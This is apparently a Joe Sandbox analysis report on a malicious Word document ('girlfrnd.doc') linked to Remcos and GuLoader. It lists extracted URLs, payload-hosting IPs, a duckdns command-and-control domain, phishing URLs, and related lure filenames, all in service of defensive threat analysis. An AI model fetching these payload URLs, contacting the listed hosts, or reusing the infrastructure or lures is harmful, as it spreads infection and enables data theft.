                        https://gmpg.org/xfn/11powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://198.46.176.133powershell.exe, 00000006.00000002.375749910.000000000264B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://cache.btrll.com/default/Pix-1x1.gifbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gp/Cpowershell.exe, 00000006.00000002.375856894.0000000004148000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://geoplugin.net/json.gpdUfwRegAsm.exe, 00000008.00000002.881967871.0000000000595000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://geoplugin.net/json.gpoUfwRegAsm.exe, 00000008.00000002.881967871.0000000000595000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://o.aolcdn.com/ads/adswrappermsni.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://asociatiatraditiimaria.ropowershell.exe, 00000010.00000002.883036623.000000000223B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.msn.com/?ocid=iehpbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/powershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://static.chartbeat.com/js/chartbeat.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.msn.com/de-de/?ocid=iehpbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFjEQNEDT32.EXE, 00000002.00000002.360360157.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://login.yahoo.com/config/loginRegAsm.exefalse
                        • URL Reputation: safe
                        unknown
                        http://104.168.45.34powershell.exe, 00000006.00000002.378504852.0000000008231000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.nirsoft.net/RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ocsp.entrust.net0Dwscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm$powershell.exe, 00000010.00000002.883036623.000000000223B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.883117116.000000000241B000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.375749910.0000000002511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.883036623.0000000002101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.883117116.00000000022E5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.ccleaner.com/go/app_cc_pro_trialkeybhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://104.168.45.34/59/createdthingstobefrankwithmeeverywhere.gIFuEQNEDT32.EXE, 00000002.00000002.360360157.000000000052F000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.entrust.net/server1.crl0wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://asociatiatraditiimaria.ro/comments/feed/powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contextual.media.net/8/nrrV73987.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://api.w.org/powershell.exe, 00000010.00000002.883036623.00000000023CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.883036623.0000000002474000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.375856894.0000000003539000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contextual.media.net/bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://asociatiatraditiimaria.ro/wp-json/powershell.exe, 00000010.00000002.883036623.00000000023CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.883036623.0000000002474000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.msn.com/bhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://ns.adobedeRegAsm.exe, 00000008.00000002.882398840.0000000000B12000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv2E13.tmp.12.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://new.quranushaiqer.org.sapowershell.exe, 00000010.00000002.883036623.0000000002489000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhv2E13.tmp.12.drfalse
                          unknown
                          https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2powershell.exe, 00000010.00000002.886556613.000000000313F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.886556613.000000000315C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://new.quranushaiqer.org.sapowershell.exe, 00000010.00000002.883036623.000000000247B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://cdn.at.atwola.com/_media/uac/msn.htmlbhv2E13.tmp.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://go.microsoft.cpowershell.exe, 00000006.00000002.375532573.00000000002BC000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/accounts/serviceloginRegAsm.exefalse
                          • Avira URL Cloud: safe
                          unknown
                          http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv2E13.tmp.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://secure.comodo.com/CPS0wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.406999069.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://policies.yahoo.com/w3c/p3p.xmlbhv2E13.tmp.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://crl.entrust.net/2048ca.crl0wscript.exe, 0000000B.00000003.415294534.000000000042D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.414773186.0000000000421000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.416825058.000000000042D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.889025767.0000000005045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.msn.com/advertisement.ad.jsbhv2E13.tmp.12.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.414488484.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          34.166.62.190
                          new.quranushaiqer.org.saUnited States
                          2686ATGS-MMD-ASUSfalse
                          93.113.54.56
                          asociatiatraditiimaria.roRomania
                          5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                          192.253.251.227
                          iwarsut775laudrye2.duckdns.orgUnited States
                          50613THORDC-ASIStrue
                          198.46.176.133
                          unknownUnited States
                          36352AS-COLOCROSSINGUSfalse
                          178.237.33.50
                          geoplugin.netNetherlands
                          8455ATOM86-ASATOM86NLfalse
                          104.168.45.34
                          unknownUnited States
                          36352AS-COLOCROSSINGUStrue
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1483047
                          Start date and time:2024-07-26 15:09:51 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 11m 46s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:24
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Sample name:girlfrnd.doc
                          renamed because original name is a hash value
                          Original Sample Name:createdgoodthingstogetmebacktheentirethingsinolineswitchtogilfrnfboobstounderstandhowfeelurareinthesituation_____________creanthesituationgirlfrnd.doc
                          Detection:MAL
                          Classification:mal100.phis.troj.spyw.expl.evad.winDOC@27/24@10/6
                          EGA Information:
                          • Successful, ratio: 71.4%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 183
                          • Number of non-executed functions: 306
                          Cookbook Comments:
                          • Found application associated with file extension: .doc
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Active ActiveX Object
                          • Scroll down
                          • Close Viewer
                          • Override analysis time to 78413.1542618433 for current running targets taking high CPU consumption
                          • Override analysis time to 156826.308523687 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 23.72.249.152, 23.72.249.132, 23.72.249.138, 199.232.214.172
                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                          • Execution Graph export aborted for target EQNEDT32.EXE, PID 428 because there are no executed function
                          • Execution Graph export aborted for target powershell.exe, PID 3604 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: girlfrnd.doc
                          TimeTypeDescription
                          09:10:43API Interceptor286x Sleep call for process: EQNEDT32.EXE modified
                          09:10:46API Interceptor41x Sleep call for process: wscript.exe modified
                          09:10:47API Interceptor7204x Sleep call for process: powershell.exe modified
                          09:10:53API Interceptor4698896x Sleep call for process: RegAsm.exe modified
                          InputOutput
                          URL: Office document Model: gpt-4o
                          ```json
                          {
                            "riskscore": 0,
                            "reasons": "The provided screenshot is completely garbled and does not contain any readable text or visually prominent buttons or links. Therefore, it is impossible to determine if it could mislead the user into clicking on a potentially harmful link. No sense of urgency, impersonation of well-known brands, or any other phishing indicators can be identified from the provided image."
                          }
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          34.166.62.190waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                            93.113.54.56waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                              dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                  https://avocat.srl/Auth#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==%25RANDOM5#7045anVsaS5yaWxlc0B6YmV0YS5jb20=??Jqeh==96682=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d%25=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousUnknownBrowse
                                    192.253.251.227waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                      awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                        UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                          ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                              pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                  korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                    doc_pl_invoice_awb_988-02403026_062024_00000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      awbshippinglabeldocuments1906202400000000000..vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        198.46.176.133erthings.docGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        #U00d6DEME TAVS#U0130YES#U0130.xlsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        042240724.xlsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        createdgoodthingswtihmewhilealot.gif.vbsGet hashmaliciousUnknownBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        greatbunfeelsoftandhoney.gif.vbsGet hashmaliciousUnknownBrowse
                                                        • 198.46.176.133/Upload/vbs.jpeg
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        new.quranushaiqer.org.sawaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 34.166.62.190
                                                        iwarsut775laudrye2.duckdns.orgwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.228
                                                        awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        UPS_Bill_of_lading_291098829T_28_06_2024_000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        ups_awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_26062024224782020031808174CN18240624000002624(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        pre_alert_awb_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        awb_shipping_post_24062024224782020031808174CN1824062400000(991KB).vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        korea_trade_product_order_specification_list_24_06_2024_0000000_pdf.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 192.253.251.227
                                                        asociatiatraditiimaria.rowaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                                        • 93.113.54.56
                                                        dhl_awb_shipping_doc_03072024224782020031808174CN18030724000000324(991KB).vbsGet hashmaliciousUnknownBrowse
                                                        • 93.113.54.56
                                                        geoplugin.neterthings.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 178.237.33.50
                                                        Payment Advice__HSBC Banking.pdf.lnkGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        C1ZsNxSer8.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        Quotation.xlsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        bg.microsoft.map.fastly.nethttps://olive-hummingbird-763499.hostingersite.com/Onedrive-inboxmessage/onenote.html#asa@aan.ptGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        One_Docx 1.pdfGet hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.214.172
                                                        https://click.pstmrk.it/3s/www.rxeffect.com/xrJC/8OO2AQ/AQ/7b025ed7-37dd-46f9-8a3c-79d484929f8e/1/x7UnC8G8B9Get hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 199.232.214.172
                                                        https://nasyiahgamping.com/_loader.html?send_id=eh&tvi2_RxT=cp.appriver.com%2Fservices%2Fspamlab%2Fhmr%2FPrepareHMRAccess.aspx%3Fex%3DCwl7OpqsAW8UXOjQpfNORMYziqeg%252fwcMKDuZuqPM%252b44%253d%26et%3DSCXX1gC0hGLFIJMBjJa%252bcPyzP9zDkcUvJzlJx8HAPYIwHybHJtlKKhvlY68%252fb09k%252bq%252fmbrOOqiV%252brsXviFPAevdalHsK83HP&url=aHR0cHM6Ly9maW5hbmNlcGhpbGUuY29tL3dwLWluY2x1ZGVzL2ltZy9kLnNhdXRpZXJAc2JtLm1jGet hashmaliciousHTMLPhisherBrowse
                                                        • 199.232.210.172
                                                        https://forms.office.com/r/xULzprLcwHGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        29246162652093218035.jsGet hashmaliciousStrela DownloaderBrowse
                                                        • 199.232.210.172
                                                        Dreher_Blend_Order_-_Week_33.xlsmGet hashmaliciousUnknownBrowse
                                                        • 199.232.214.172
                                                        http://cs9.bizGet hashmaliciousUnknownBrowse
                                                        • 199.232.210.172
                                                        57151318598011868.jsGet hashmaliciousStrela DownloaderBrowse
                                                        • 199.232.210.172
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        GTSCEGTSCentralEuropeAntelGermanyCZwaybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 93.113.54.56
                                                        LisectAVT_2403002A_35.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                        • 185.146.87.128
                                                        sh4.elfGet hashmaliciousMiraiBrowse
                                                        • 195.56.40.173
                                                        RiI7W2cj7p.elfGet hashmaliciousUnknownBrowse
                                                        • 213.29.127.166
                                                        https://liceultehnologicrosiajiu.ro/ulin/ulin8ce.htmlGet hashmaliciousCVE-2024-21412Browse
                                                        • 85.9.47.248
                                                        KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                                        • 212.203.170.235
                                                        5xUAAMwlnJ.elfGet hashmaliciousUnknownBrowse
                                                        • 193.86.218.248
                                                        COMANDA_AXM_NR17_DIN_240717.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                        • 185.146.87.128
                                                        92.249.48.47-skid.ppc-2024-07-20T09_04_20.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 217.153.110.218
                                                        waybill_shipping_documents_original_BL_CI&PL_01_07_2024_00000000_doc.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 188.214.214.160
                                                        AS-COLOCROSSINGUSerthings.docGet hashmaliciousRemcosBrowse
                                                        • 192.3.101.142
                                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133
                                                        PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                                        • 192.227.225.166
                                                        PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                                        • 192.227.225.166
                                                        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                                        • 192.3.101.142
                                                        PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                                                        • 192.227.225.166
                                                        Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133
                                                        AWD 490104998518.xlsGet hashmaliciousRemcosBrowse
                                                        • 198.46.176.133
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 104.168.45.34
                                                        IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                                                        • 198.46.178.145
                                                        ATGS-MMD-ASUShttps://forms.office.com/Pages/ResponsePage.aspx?id=F0il39lMqEiGOt9WRpZx4wvO-e767m5Jgq527TAyuTxUNFdESUY2VVdIOU5UTDkxN01BVUg0V1dIWi4uGet hashmaliciousUnknownBrowse
                                                        • 34.135.178.72
                                                        file.exeGet hashmaliciousBabadedaBrowse
                                                        • 34.149.100.209
                                                        6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                        • 34.160.144.191
                                                        waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xlsGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 34.166.62.190
                                                        file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                        • 34.149.100.209
                                                        file.exeGet hashmaliciousBabadedaBrowse
